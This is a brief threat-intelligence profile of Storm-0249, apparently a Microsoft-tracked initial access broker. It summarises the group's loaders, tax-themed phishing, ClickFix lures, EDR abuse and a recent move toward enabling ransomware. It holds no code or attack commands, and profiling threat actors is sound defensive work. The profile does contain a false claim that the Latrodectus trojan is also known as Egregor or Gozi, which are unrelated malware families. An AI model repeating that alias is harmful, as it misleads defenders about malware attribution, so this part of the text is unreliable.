Storm-0249 is a cyber threat actor classified by Microsoft as an initial access broker (IAB) in its “Storm” naming convention for emerging or developing groups. 

Active since at least 2021, it specializes in gaining unauthorized entry into victim networks and selling those footholds to other cybercriminals, such as ransomware operators like Storm-0501.

Key Activities and Tactics

•  Malware Distribution: Storm-0249 has deployed loaders and malware including BazaLoader, IcedID, Bumblebee, Emotet, and the Latrodectus trojan (also known as Egregor or Gozi). These are often spread via phishing emails with tax-themed lures or fake download sites mimicking legitimate software like Microsoft tools.

•  Phishing and Social Engineering: It has run campaigns exploiting seasonal events, such as U.S. tax season, to deliver post-exploitation frameworks like Brute Ratel C4 (BRc4). More recently, it has shifted to hijacked websites and “ClickFix” tactics, where victims are tricked into running malicious commands in Windows to download malware.

•  Advanced Persistence: In preparation for ransomware, it abuses trusted tools like endpoint detection and response (EDR) solutions (e.g., SentinelOne), fileless PowerShell execution, DLL side-loading, and domain spoofing for stealthy access and evasion.

Recent Escalations (as of December 2025)

Storm-0249 appears to be evolving from pure access brokering to directly facilitating ransomware by targeting high-value sectors like cryptocurrency wallets and using evasive techniques to bypass defenses. Microsoft first publicly detailed the group in September 2024, and ongoing reports highlight its growing sophistication.